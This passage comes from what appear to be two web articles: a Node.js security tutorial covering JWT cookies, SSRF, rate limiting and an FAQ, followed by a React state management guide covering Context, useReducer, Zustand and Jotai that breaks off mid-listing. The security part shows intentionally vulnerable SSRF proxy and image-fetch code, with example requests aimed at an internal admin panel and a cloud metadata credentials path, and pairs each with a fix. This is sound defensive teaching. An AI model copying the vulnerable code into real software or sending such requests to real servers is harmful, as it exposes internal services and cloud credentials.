    if (error.name === 'TokenExpiredError') {
      return res.status(401).json({ error: 'Token expired' });
    }
    res.status(401).json({ error: 'Invalid token' });
  }
});

The above code snippet demonstrates a strong focus on security through several measures:

  • Environment Variables: Sensitive data such as the JWT secret is stored in environment variables. This avoids hardcoding it and reduces the risk of exposure.
  • Secure Cookies: The JWT is stored in an HttpOnly cookie with the secure and SameSite=strict flags, which mitigates XSS-based token theft and CSRF attacks.
  • Role-Based Access Control: The implementation checks the user’s role before allowing access to the protected resources in the application. Only authorized users can access sensitive endpoints.
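A matching .env entry could look like this; the value is a placeholder, and the file must never be committed to version control:

# .env – loaded by dotenv at application start
JWT_SECRET=replace-with-a-long-random-string-of-at-least-32-characters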

Topic 3 – Preventing SSRF Attacks in Node.js Security

Server-Side Request Forgery (SSRF) is a type of vulnerability where attackers can make servers send requests to unintended targets. This is particularly relevant in the Node.js environment, since HTTP requests are easy to make with libraries such as axios, request, got, node-fetch, and the native http/https modules.

SSRF attacks exploit server-side code that makes requests to other services, allowing attackers to:

  1. Access internal services behind firewalls that aren’t normally accessible from the internet.
  2. Scan internal networks and discover services on private networks.
  3. Interact with metadata services in cloud environments (e.g. AWS EC2 metadata service).
  4. Exploit trust relationships between the server and other internal services.

Common Attack Vectors

  1. URL Parameters in API Proxies: Many Node.js applications function as API gateways or proxies, forwarding requests to backend services.

Vulnerable Example:

const express = require('express');
const axios = require('axios');
const app = express();

app.get('/proxy', async (req, res) => {
  const url = req.query.url;
  try {
    // User can control the URL completely
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

In this example, an attacker could provide a URL pointing to an internal service, such as: GET /proxy?url=http://internal-admin-panel.local/users

Now let’s look at a secure implementation:

const express = require('express');
const axios = require('axios');
const URL = require('url').URL;
const app = express();

// Define allowed domains
const ALLOWED_HOSTS = ['api.trusted.com', 'public-service.org'];

app.get('/proxy', async (req, res) => {
  const url = req.query.url;

  try {
    // Validate URL format
    const parsedUrl = new URL(url);
    if (!ALLOWED_HOSTS.includes(parsedUrl.hostname)) {
      return res.status(403).json({ error: 'Domain not allowed' });
    }

    // Proceed with request to allowed domain
    const response = await axios.get(url);
    res.json(response.data);
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

In the example above, a few best practices were followed:

Domain Whitelisting:

  • Defines a list of allowed domains (ALLOWED_HOSTS).
  • Checks whether the hostname of the user-supplied URL is in this list before proceeding with the request.
  • Ensures that only requests to trusted domains are allowed, reducing the risk of SSRF attacks.
  • Prevents the application from making requests to unauthorized or potentially malicious domains.

  2. File Upload Services with Remote URL Support

Vulnerable Code:

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // Downloads from any URL without validation
    const response = await axios.get(imageUrl, { responseType: 'arraybuffer' });
    const imageBuffer = Buffer.from(response.data);

    // Save to local storage
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(500).json({ error: error.message });
  }
});

An attacker can supply a malicious URL that can force the server to make requests to internal services or endpoints that should not be accessed by the public. This can result in the exposure of sensitive information or internal networks.

Example Attack:

POST /fetch-image
Body: { "imageUrl": "http://169.254.zzz.xxx/latest/meta-data/iam/security-credentials/" }

Secure Implementation/Fix

  • Validate URL Format: Use the URL constructor to make sure the URL is well formed. Disallow anything but http and https to avoid the possibility of harmful protocols being used.
  • DNS Resolution and IP Blocking: Resolve the hostname to an IP address using dns.lookup and block private ranges (10.x.x.x, 172.16.x.x–172.31.x.x, 192.168.x.x, 127.x.x.x, 169.254.x.x) so the server cannot be tricked into reaching internal network resources.
  • Preventing Redirects: Set the maxRedirects property of the axios request to 0 to avoid redirect-based bypasses that can allow access to prohibited URLs.
const dns = require('dns').promises;

app.post('/fetch-image', async (req, res) => {
  const imageUrl = req.body.imageUrl;

  try {
    // 1. Validate URL format
    const parsedUrl = new URL(imageUrl);

    // 2. Only allow http/https protocols
    if (!['http:', 'https:'].includes(parsedUrl.protocol)) {
      return res.status(403).json({ error: 'Protocol not allowed' });
    }

    // 3. Resolve hostname to IP
    const { address } = await dns.lookup(parsedUrl.hostname);

    // 4. Block private IP ranges
    if (/^(10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|127\.|169\.254\.)/.test(address)) {
      return res.status(403).json({ error: 'Cannot access internal resources' });
    }

    // 5. Now safe to proceed
    const response = await axios.get(imageUrl, {
      responseType: 'arraybuffer',
      maxRedirects: 0 // Prevent redirect-based bypasses
    });

    const imageBuffer = Buffer.from(response.data);
    fs.writeFileSync(`./uploads/${Date.now()}.jpg`, imageBuffer);
    res.json({ success: true });
  } catch (error) {
    res.status(400).json({ error: 'Invalid URL or request failed' });
  }
});

Topic 4 – Rate Limiting and DoS Protection

Attackers are known to launch traffic-based attacks on Node.js applications to knock or take over systems:

  1. Distributed Denial of Service (DDoS): Your server is flooded with so many requests from so many sources that legitimate users can no longer access the service.
  2. Brute Force Attempts: Attackers use automated tools to try large numbers of credential combinations in an attempt to guess valid authentication credentials.
  3. Scraping and Harvesting: Bots issue large numbers of requests to harvest content from your application, degrading performance and leaking data.
  4. API Abuse: Excessive API requests that consume resources or exploit the free tiers of your application’s APIs.

Note: At the infrastructure level, solutions including AWS WAF, Cloudflare, or Nginx can provide better protection without imposing too much load on your application code. These services provide more sophisticated features like distributed rate limiting, traffic monitoring, and auto-scaling during attacks. But this article focuses only on application-level security policies.

Traffic Management Best Practices

Proper traffic management begins with rate limiting both in the application and infrastructure. This can be done in Node.js using the express-rate-limit middleware package.

const rateLimit = require('express-rate-limit');

const apiLimiter = rateLimit({
  windowMs: 15 * 60 * 1000,
  max: 100, // limit each IP to 100 requests per windowMs
  message: 'Too many requests, please try again later.'
});

app.use('/api/', apiLimiter); // Apply to all API endpoints

To gain finer control, set different rate limits for different endpoints depending on their sensitivity and resource requirements.

For instance, authentication endpoints usually need stricter limits than general content endpoints. In addition, implement progressive delays for failed attempts and account lockout policies for persistent failures. The node-rate-limiter-flexible library adds features like Redis-based distributed rate limiting for apps deployed on multiple servers.
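For example, a stricter limiter for the login route can sit next to the general API limiter; the concrete window and maximum values below are assumptions:

const loginLimiter = rateLimit({
  windowMs: 15 * 60 * 1000, // 15 minutes
  max: 5, // allow only 5 login attempts per IP in that window
  message: 'Too many login attempts, please try again later.'
});

// Stricter limit for authentication, looser limit for the rest of the API
app.use('/api/login', loginLimiter);
app.use('/api/', apiLimiter);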

Mitigating DoS Vulnerabilities

Set request size limits to prevent payload attacks:

app.use(express.json({ limit: '10kb' }));

app.use(express.urlencoded({ extended: true, limit: '10kb' }));

Use helmet for additional HTTP security headers:

const helmet = require('helmet');

app.use(helmet());

Infrastructure-Level Protection

Security is best approached at the infrastructure level, with application-level security as a secondary layer. Options include:

  • Reverse Proxies: Nginx or HAProxy can act as a barrier, perform rate limiting, and sit as a middle layer between your clients and the application.
  • CDNs: Cloudflare or Fastly offer integrated DDoS protection and rate limiting.
  • Cloud Provider Solutions: AWS WAF, Azure Front Door, or Google Cloud Armor can be used to monitor and filter traffic.
  • Load Balancers: These distribute traffic across multiple instances, spreading the load and filtering suspicious requests.

Conclusion: Strengthening Node.js Security Layers

Node.js security is an evolving challenge; keeping up with remediation strategies is essential to protect your applications from modern attack vectors. As discussed in detail in this article, attackers are always looking for ways to exploit traffic vulnerabilities. Therefore, a layered approach is necessary. Key points to keep in mind include:

  • In-depth defense is essential: Combine application-level protections such as middleware and request limits with infrastructure-level defenses like reverse proxies, CDNs, and WAFs to create several layers of protection against traffic-based attacks on Node.js apps.
  • Understand attack patterns: Effective defense is only possible if you understand strategies like DDoS attacks, brute force attempts, API abuse, and resource exhaustion.
  • Balance security with usability: Set rate limits properly to prevent malicious traffic without affecting the service quality of legitimate users. Endpoints need different thresholds as per their risk and frequency of use.
  • Implement graduated responses: Step-by-step measures should be taken beginning with slight delays, temporary blockage, and permanent IP blockage for severe attackers as per the frequency and severity of suspicious activities.
  • Continuously monitor and adjust: Security is not set and forget—traffic patterns should be analyzed regularly, rate limits should be checked and altered, and protection mechanisms should be updated to address new threats and application requirements.
  • Leverage existing tools: Use proven solutions such as express-rate-limit, Cloudflare, or AWS WAF instead of developing your own and risking critical errors during development.
  • Consider distributed applications: For applications deployed on several servers, the distributed rate limiting policy should be implemented using Redis or a similar technology to ensure that the whole infrastructure is uniformly protected.
  • Test your defenses: Regularly conduct penetration testing to verify the effectiveness of your rate limiting and DoS protection measures under realistic attack scenarios.

 

🔍 Frequently Asked Questions (FAQ)

1. What are the main dependency risks in Node.js applications?

Node.js applications often depend on hundreds of third-party packages, increasing their exposure to vulnerabilities. Outdated packages, supply chain compromises, and dependency confusion are among the most critical risks developers must mitigate.

2. How can outdated Node.js packages introduce security vulnerabilities?

Outdated packages may contain known vulnerabilities that attackers can exploit. For example, lodash v4.17.15 has a prototype pollution issue that was fixed in v4.17.19, affecting thousands of dependent packages.

3. What is a supply chain attack in the Node.js ecosystem?

A supply chain attack occurs when malicious code is injected into a trusted dependency, often through social engineering or takeover of an inactive package. This code propagates downstream, compromising applications that rely on the affected package.

4. How can developers prevent dependency confusion in npm?

To prevent dependency confusion, developers should use scoped packages (e.g., @company/package) and configure the publishConfig.registry field to enforce use of internal registries.

5. What are common JWT vulnerabilities in Node.js?

Frequent JWT vulnerabilities include hardcoded secrets, weak signing algorithms, lack of token validation, and insecure token storage. These flaws can lead to unauthorized access and token abuse.

6. How should JWTs be securely implemented in Node.js?

Secure JWT implementations use environment variables for secrets, set expiration and validation claims, and transmit tokens via HttpOnly cookies with strict flags to mitigate XSS and CSRF attacks.

7. What is Server-Side Request Forgery (SSRF) and how can it be exploited in Node.js?

SSRF exploits occur when an attacker manipulates the server into making unauthorized requests, potentially exposing internal services or metadata endpoints. This is often done via user-controlled URLs in APIs or file uploads.

8. How can developers mitigate SSRF in Node.js applications?

Mitigation techniques include domain whitelisting, validating URL protocols, resolving DNS to block private IPs, and disabling redirects in HTTP clients like Axios.

9. What are best practices for rate limiting in Node.js?

Use libraries like express-rate-limit to set per-IP request caps, apply stricter controls on authentication routes, and consider distributed rate limiting via Redis for multi-instance applications.

10. How can infrastructure-level protection enhance Node.js app security?

Infrastructure tools like AWS WAF, Cloudflare, and Nginx offer advanced rate limiting, request filtering, and DDoS protection beyond what app-level middleware can provide.

What’s the Best Way to Manage State in React?

No topic is as controversial in the React world as state management. Unlike many other topics, there aren’t just two camps. Solutions range from categorically rejecting central state management to implementing state management solutions with React’s built-in tools or lightweight libraries, right through to using heavyweight solutions that determine the entire application’s architecture. Let’s examine several state management approaches and use cases, focusing on lightweight solutions with a low overhead and a limited impact on the overall application.

The post What’s the Best Way to Manage State in React? appeared first on International JavaScript Conference.

]]>
Let’s start at the very beginning: Why is central state management necessary? This question is not exclusive to React; it arises from modern single-page frameworks’ component-based approaches. In these frameworks, components form the central building blocks of applications. Components can have their own state, which contains either the data to be presented in the browser or the status of UI elements. A frontend application usually contains a large number of small, loosely coupled, and reusable components that form a tree structure. The closer the components are to the root of the tree, the more they are integrated into the application’s structure and business logic.

The leaf components of the tree are usually UI components that take care of the display. The components need data to display. This data usually comes from a backend interface and is loaded by the frontend components. In theory, each component can retrieve its own data, but this results in a large number of requests to the backend. Instead, requests are usually bundled at a central point. The component forming the lowest common ancestor, i.e., the parent of all components that need information from this backend interface, is typically the appropriate location for server communication and data management.

And this is precisely the problem leading to central state management. Data from the backend has to be transferred to the components handling the display. This data flow is handled by props, the dynamic attributes of the components. This channel also takes care of write communication: creating, modifying, and deleting data. This isn’t an issue if there are only a few steps between the data source and display, but the longer the path, the greater the coupling of the component tree. Some of the components between the source and the target have nothing to do with the data and simply pass it on. However, this significantly limits reusability. The concept of central state management solves this by eliminating the communication channel using props and giving child components direct access to the information. React’s Context API makes this shortcut possible.

Central state management has many use cases. It’s often used in applications that deal with data record management. This includes applications that manage articles and addresses, fleet management, smart home controls, and learning management applications. The one thing all use cases have in common is that the topic runs through the entire application and different components need to access the data. Central state management minimizes the number of requests, acts as a single source of truth, and handles data synchronization.

Can You Manage Central State in React Without Extra Libraries?

For a long time, the Redux library was the central state management solution, and it’s still popular today. With around 8 million weekly package downloads, the React bindings for Redux are ahead of popular libraries like TanStack Query with 5 million downloads or React Hook Form with 6.5 million downloads. Overall, Redux downloads have been stagnating for some time. This is partly due to Redux’s somewhat undeserved bad reputation. The library has long been accused of causing unnecessary overhead, which prompted Dan Abramov, one of its developers, to write his famous article entitled “You might not need Redux.” Essentially, he says that Redux does involve a certain amount of overhead, but it quickly pays off in large applications. Extensions like the Redux Toolkit also further reduce the extra effort.

The lightest Redux alternative consists of a custom implementation based on React’s Context API and State Hook. The key advantage is that you don’t need any additional libraries. For example, let’s imagine a shopping cart in a web shop. The cart is one of the shop’s central elements and you need to be able to access it from several different places. In the shop, you should be able to add products to the cart using a list. The list shows the number of items currently in the shopping cart. An overview component shows how many products are in the cart and the total value. Both components – the list and the overview – should be independent of each other but always show the latest information.

Without React’s Context API, the only solution is to store shopping cart data in the state of a component that’s a parent to both components. This parent then passes its state to the components using props. This creates a very tight coupling between these components. A better solution is based on the Context API. For this, you need the context, which you create with the createContext function. The provider component of the context binds it to the component tree, supplies it with a concrete value, and allows child components to access it. Since React 19, the context object can also be used directly as a provider. This eliminates the need to take a detour via the context’s provider component. With useContext (or, since React 19, the use function), you can access the context. Listing 1 shows the implementation of CartContext.

Listing 1: Implementing CartContext

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  SetStateAction,
  use,
  useState,
} from 'react';
import { Cart } from './types/Cart';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

The idea behind React’s Context API is that you can store any structure and access it from all child components. The structure can be a simple value like a number or a string, but objects, arrays, and functions are also allowed. In our example, the cart’s state structure is in the context. As usual in React, this is a tuple consisting of the state object, which you can use to read the state, and a function that can change the state. The CartContext can either contain the state structure or the value null. When you call the createContext function, you pass null as the default value. This lets you check if the context provider has been correctly integrated.

The CartProvider component defines the cart state and passes it as a value to the context. It accepts children in the form of a ReactNode object. This lets you integrate the CartProvider component into your component tree and gives all child components access to the context.

The last implementation component is a hook function called useCart. This controls access to the context. The use function provides the context value. If the value is null, it indicates that useCart was called outside of a CartProvider. In this case, the function throws an exception instead of returning the state value.

What does the application code look like when you want to access the state? We’ll use the ListItem component as an example. It accesses the context in both read and write mode. Listing 2 shows the simplified source code for the component.

Listing 2: Accessing the context

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);

  const [cart, setCart] = useCart();

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          {
            ...product,
            quantity,
          },
        ],
      }));
    }
  }

  return (
    <li>
      {product.name}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />
      <button onClick={addToCart}>add</button>
    </li>
  );
};

export default ListItem;

The ListItem component represents each entry in the product list and displays the product name and an input field where you can specify the number of products you want to add to the shopping cart. When you click the button, the component’s addToCart function updates the cart context. This works because the useCart function provides access to the shopping cart state, while the input field supplies the current product quantity. The setCart function is then used to update the context.

One disadvantage of this implementation is that the ListItem component has to know the structure of the CartContext in detail and performs the state update itself in the callback passed to the setCart function. You can solve this by extracting this block into a separate function. That way, the ListItem component, as well as every other component in the application, can access the functionality.
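
One way this extraction could look is a shared hook that mirrors the logic from Listing 2 (a purely local sketch; the server-backed variant follows in the next section):

import { useRef } from 'react';
import { Product } from './types/Product';
import { useCart } from './CartContext';

export function useAddToCart(product: Product) {
  const [, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);
    if (quantity) {
      // Replace any existing entry for this product with the updated quantity
      setCart((prev) => ({
        items: [
          ...prev.items.filter((item) => item.id !== product.id),
          { ...product, quantity },
        ],
      }));
    }
  }

  return [inputRef, addToCart] as const;
}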

How Do You Synchronize React State with Server Communication?

This solution only works locally in the browser. If you close the window or if a problem occurs, the current shopping cart disappears. You can solve this by applying the actions locally to the state and saving the operations on the server. But this makes implementation a little more complex. When loading the component structure, you must load the currently valid shopping cart from the server and save it to the state. Then, apply each change both on the server side and in the local state. Although this results in some overhead, the advantage is that the current state can be restored at any time, regardless of the browser instance. If you implement the addToCart functionality as a separate hook function, the components remain unaffected by this adjustment.

Listing 3: Implementing the addToCart Functionality

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  RefObject,
  SetStateAction,
  use,
  useEffect,
  useRef,
  useState,
} from 'react';
import { Cart } from './types/Cart';
import { Product } from './types/Product';

type CartContextType = [Cart, Dispatch<SetStateAction<Cart>>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};
export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const cart = useState<Cart>({ items: [] });

  useEffect(() => {
    fetch('http://localhost:3001/cart')
      .then((response) => response.json())
      .then((data) => cart[1](data));
  }, []);

  return <CartContext value={cart}>{children}</CartContext>;
};

export function useCart() {
  const context = use(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart(
  product: Product
): [RefObject<HTMLInputElement | null>, () => void] {
  const [cart, setCart] = useCart();
  const inputRef = useRef<HTMLInputElement>(null);

  function addToCart() {
    const quantity = Number(inputRef.current?.value);

    if (quantity) {
      const updatedItems = [
        ...cart.items.filter((item) => item.id !== product.id),
        { ...product, quantity },
      ];

      fetch('http://localhost:3001/cart', {
        method: 'PUT',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ id: 1, items: updatedItems }),
      })
        .then((response) => response.json())
        .then((data) => setCart(data));
    }
  }

  return [inputRef, addToCart] as const;
}

The CartProvider component loads the current shopping cart from the server. How users access the shopping cart depends upon the specific interface implementation. The code in the example assumes that the server makes the shopping cart available for the current user via /cart. One potential solution is to differentiate between users using cookies. The second adjustment consists of the useAddToCart function. It receives a product and generates the addToCart function and the ref for the input field. In the addToCart function, the shopping cart is updated locally, sent to the server, and then the local state is set by calling the setCart function. During implementation, we assume the shopping cart is updated via a PUT request to /cart and that this interface returns the updated shopping cart.

Implementation using a combination of context and state is suitable for manageable use cases. It’s lightweight and flexible, but large applications run the risk of the central state becoming chaotic. One possible fix is no longer exposing the function for modifying the state externally, but using the useReducer hook instead.

How Can You Manage React State Using Actions?

React offers another hook for component state management: the useReducer hook. Unlike the more commonly used useState hook, it does not provide a function for directly changing the state. Instead, it returns a tuple of readable state and a dispatch function. When you call the useReducer function, you pass a reducer function whose task is to generate a new state from the previous state and an action object.

The action object describes the change, like adding products to the shopping cart. Actions are usually simple JavaScript objects with the properties type and payload. The type property specifies the type of action, and the payload provides additional information.

The reducer hook is intended for local state management, but you can easily integrate asynchronous server communication. However, it’s recommended that you separate synchronous local operations from asynchronous server-based operations. The reducer should be a pure function and free of side effects. This means that the same inputs always result in the same outputs and the current state is only changed based on the action provided. If you stick to this rule, your code will be clearer and better structured, and error handling is easier. You’ll also be more flexible when it comes to future software extensions. Listing 4 shows an implementation of state management with the useReducer hook.

Listing 4: Using the useReducer Hook

import {
  createContext,
  Dispatch,
  FC,
  ReactNode,
  useContext,
  useEffect,
  useReducer,
} from 'react';
import { Cart, CartItem } from './types/Cart';

const SET_CART = 'setCart';
const ADD_TO_CART = 'addToCartAsync';
const FETCH_CART = 'fetchCart';

type FetchCartAction = {
  type: typeof FETCH_CART;
};

type SetCartAction = {
  type: typeof SET_CART;
  payload: Cart;
};

type AddToCartAsyncAction = {
  type: typeof ADD_TO_CART;
  payload: CartItem;
};

type CartAction = FetchCartAction | SetCartAction | AddToCartAsyncAction;

type CartContextType = [Cart, Dispatch<CartAction>];
const CartContext = createContext<CartContextType | null>(null);

type CartProviderProps = {
  children: ReactNode;
};

function cartReducer(state: Cart, action: CartAction): Cart {
  switch (action.type) {
    case SET_CART:
      return action.payload;

    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
}

function cartMiddleware(dispatch: Dispatch<CartAction>, cart: Cart) {
  return async function (action: CartAction) {
    switch (action.type) {
      case FETCH_CART: {
        const response = await fetch('http://localhost:3001/cart');
        const data = await response.json();
        dispatch({ type: SET_CART, payload: data });
        break;
      }
      case ADD_TO_CART: {
        const response = await fetch('http://localhost:3001/cart', {
          method: 'PUT',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            items: [...cart.items, action.payload],
          }),
        });

        const updatedCart = await response.json();
        dispatch({ type: SET_CART, payload: updatedCart });
        break;
      }
      default:
        dispatch(action);
    }
  };
}

export const CartProvider: FC<CartProviderProps> = ({ children }) => {
  const [cart, dispatch] = useReducer(cartReducer, { items: [] });
  const enhancedDispatch = cartMiddleware(dispatch, cart);

  useEffect(() => {
    enhancedDispatch({ type: FETCH_CART });
  }, []);

  return (
    <CartContext.Provider value={[cart, enhancedDispatch]}>
      {children}
    </CartContext.Provider>
  );
};

export function useCart() {
  const context = useContext(CartContext);
  if (!context) {
    throw new Error('useCart must be used within a CartProvider');
  }
  return context;
}

export function useAddToCart() {
  const [, dispatch] = useCart();

  const addToCart = (item: CartItem) => {
    dispatch({ type: ADD_TO_CART, payload: item });
  };

  return addToCart;
}

The CartProvider component is the starting point for implementation. It holds the context and creates the state using the useReducer hook. It also uses the FETCH_CART action to ensure that the existing shopping cart is loaded from the server. The code has two parts: the reducer itself and a middleware. The reducer takes the form of the cartReducer function and is responsible for the local state. It consists of a switch statement and, in this simple example, supports the SET_CART action, which sets the shopping cart. What’s more interesting though is the cartMiddleware function. This is responsible for the asynchronous actions FETCH_CART and ADD_TO_CART. Unlike the reducer, the middleware cannot access the state directly, but must pass changes to the reducer via actions. To do this, it uses the dispatch function from the useReducer hook. The middleware can also have side effects such as asynchronous server communication. For example, the FETCH_CART action triggers a GET request to the server to retrieve the data from the current shopping cart. Once the data is available, it’s written to the local state using the SET_CART action.

If the middleware isn’t responsible for a received action, it passes it directly to the reducer so that you don’t need to distinguish between the two in the application and can simply use the middleware.

The useCart and useAddToCart functions are the interfaces between the application components and the reducer. Listing 5 shows how to use the reducer implementation in your components.

Listing 5: Integrating the reducer implementation

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCart, useAddToCart } from './CartContext';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const [cart] = useCart();
  const addToCart = useAddToCart();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cart.items.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

Read access to the state still happens via the useCart function. The useAddToCart function creates a new function to which you can pass a new or updated shopping cart item. This function generates the necessary action and dispatches it via the middleware.

Both the useState and useReducer approaches require a relatively large amount of boilerplate code around the business logic of the application’s state management. Therefore, libraries exist that reduce this overhead, and Zustand is one of the most lightweight.

What Makes Zustand a Scalable State Management Solution?

The Zustand library takes care of the state of an application. The Zustand API is minimalistic, yet the library has all the features you need to centrally manage the state of your application. The stores are the central element, which are created with the create function. They hold the state and provide methods for modification. In your application’s components, you can interact with Zustand’s stores using hook functions. The library lets you perform both synchronous and asynchronous actions and gives the option of storing the state in the browser’s LocalStorage or IndexedDb via middleware. We don’t have to go that far for shopping cart management implementation in our example. It’s enough to load an existing shopping cart from the server and manage it with the list component. It should be possible to access the state from other components, like CartOverview, which shows a summary of the shopping cart.
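
As an illustration of the persistence middleware mentioned above, a store could be wrapped like this (a sketch that is not part of the example application; the storage key is made up):

import { create } from 'zustand';
import { persist, createJSONStorage } from 'zustand/middleware';
import { CartItem } from './types/Cart';

type PersistedCartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => void;
};

export const usePersistedCartStore = create<PersistedCartStore>()(
  persist(
    (set) => ({
      cartItems: [],
      addToCart: (item) =>
        set((state) => ({ cartItems: [...state.cartItems, item] })),
    }),
    {
      name: 'cart-storage', // key used in LocalStorage
      storage: createJSONStorage(() => localStorage),
    }
  )
);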

Before you can use Zustand, you have to install the library with your package manager. You can do this with npm using the command npm add zustand. The library comes with its own type definitions, so you don’t need to install any additional packages to use it in a TypeScript environment.

Create the CartStore outside the components of your application in a separate file. This manages items in the shopping cart. You can control access to the store with the useCartStore function, which gives access to the state and provides methods for adding products and loading the shopping cart from the server. Listing 6 shows the implementation details.

Listing 6: Access to the store

import { create } from 'zustand';
import { CartItem } from './types/Cart';

export type CartStore = {
  cartItems: CartItem[];
  addToCart: (item: CartItem) => Promise<void>;
  loadCart: () => Promise<void>;
};

export const useCartStore = create<CartStore>((set, get) => ({
  cartItems: [],

  addToCart: async (item: CartItem) => {
    set((state) => {
      const existingItemIndex = state.cartItems.findIndex(
        (cartItem) => cartItem.id === item.id
      );

      let updatedCart: CartItem[];
      if (existingItemIndex !== -1) {
        updatedCart = [...state.cartItems];
        updatedCart[existingItemIndex] = item;
      } else {
        updatedCart = [...state.cartItems, item];
      }

      return { cartItems: updatedCart };
    });

    await saveCartToServer(get().cartItems);
  },

  loadCart: async () => {
    const response = await fetch('http://localhost:3001/cart');
    const data: CartItem[] = (await response.json())['items'];
    set({ cartItems: data });
  },
}));

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

Zustand’s create function is implemented as a generic function. This means you can pass the state structure to it. TypeScript helps where needed, whether in your development environment or your application’s build process. Pass a callback function to the create function; you can use the get function for read access and the set function for write access to the state. The set function behaves similarly to React’s setState function. You can use the previous state to define a new structure and use it as the return value. The callback function that you pass to create returns an object structure. Then, define the state structure (in our case, this is cartItems) and methods for accessing it like addToCart and loadCart. The addToCart method is implemented as an async method and manipulates the state with the set function. It also uses the helper function saveCartToServer to send the data to the server. After set is executed, the state already has the updated value, so you can read it with get. Always try to treat the state as a single source of truth.

The asynchronous loadCart method is used to initially fill the state with data from the server. You should execute this method once in a central location to make sure that the state is initialized correctly. Listing 7 shows an example using the application’s app component.

Listing 7: Integrating into the app component

import './App.css';
import List from './List';
import CartOverview from './CartOverview';
import { useCartStore } from './cartStore';
import { useEffect } from 'react';

function App() {
  const { loadCart } = useCartStore();

  useEffect(() => {
    loadCart();
  }, []);

  return (
    <>
      <CartOverview />
      <hr />
      <List />
    </>
  );
}

export default App;

Working with the state happens in your application’s components, like the ListItem component. Here, you call the useCartStore function, use the cartItems structure to access the data in the store, and add new products using the addToCart method. Listing 8 contains the corresponding code.

Listing 8: Integration into the ListItem component

import { FC, useRef } from 'react';
import { Product } from './types/Product';
import { useCartStore } from './cartStore';

type Props = {
  product: Product;
};
const ListItem: FC<Props> = ({ product }) => {
  const inputRef = useRef<HTMLInputElement>(null);
  const { cartItems, addToCart } = useCartStore();

  return (
    <li>
      {product.name}{' '}
      <input
        type="text"
        ref={inputRef}
        defaultValue={
          cartItems.find((item) => item.id === product.id)?.quantity
        }
      />{' '}
      <button
        onClick={() =>
          addToCart({ ...product, quantity: Number(inputRef.current?.value) })
        }
      >
        add
      </button>
    </li>
  );
};

export default ListItem;

What’s remarkable about Zustand is that you don’t have to worry about integrating a provider. That’s because Zustand doesn’t rely on React’s Context API to manage global state. One disadvantage is that the store is truly global. So you can’t have two identical stores with different data states in your component hierarchy’s subtrees. On the other hand, bypassing the Context API has some performance advantages that make Zustand an interesting alternative.

Why Choose Jotai for React State Management?

Similar to Zustand, Jotai is a lightweight library for state management in React. The library works with small, isolated units called atoms and uses React’s Hook API. Like Zustand, Jotai does not use React’s Context API by default. The individual central state elements and the interfaces to them are significantly smaller and clearly separated from each other. The atom function plays a central role, allowing you to define both the structure and the access functions. This definition takes place outside of the application’s components. The connection between the atoms and components is formed by the useAtom function, which enables you to interact with the central state.

You can install the Jotai library with the command npm add jotai. The difference between it and Zustand is that Jotai works with much finer structures. The atom is the central element here. In a simple instance, you pass the initial value to the atom function when you call it and can use it throughout your application. If you’re using TypeScript, you have the option of defining the type of the atom value as generic.
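
For illustration, a primitive atom with an explicitly typed initial value might look like this (the atom name is made up for this example):

import { atom } from 'jotai';

// A primitive atom with a generic type parameter for its value
const quantityAtom = atom<number>(1);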

Jotai provides three different hook functions for accessing the atom from a component. useAtom returns a tuple for read and write access. This tuple is similar in structure to the tuple returned by React’s useState hook. useAtomValue returns only the first part of the tuple, giving you read-only access to the atom. The counterpart is the useSetAtom function, which gives you the setter function for the atom. You can already achieve a lot with this structure, but Jotai also lets you combine atoms. To implement the shopping cart state, you create three atoms in total. One represents the shopping cart, one is for adding products, and one is for loading data from the server. Listing 9 shows the implementation details.

Listing 9: Implementing the atoms

import { atom } from 'jotai';
import { CartItem } from './types/Cart';

const cartItemsAtom = atom<CartItem[]>([]);

async function saveCartToServer(cartItems: CartItem[]): Promise<void> {
  await fetch('http://localhost:3001/cart', {
    method: 'PUT',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ items: cartItems }),
  });
}

const addToCartAtom = atom(null, async (get, set, item: CartItem) => {
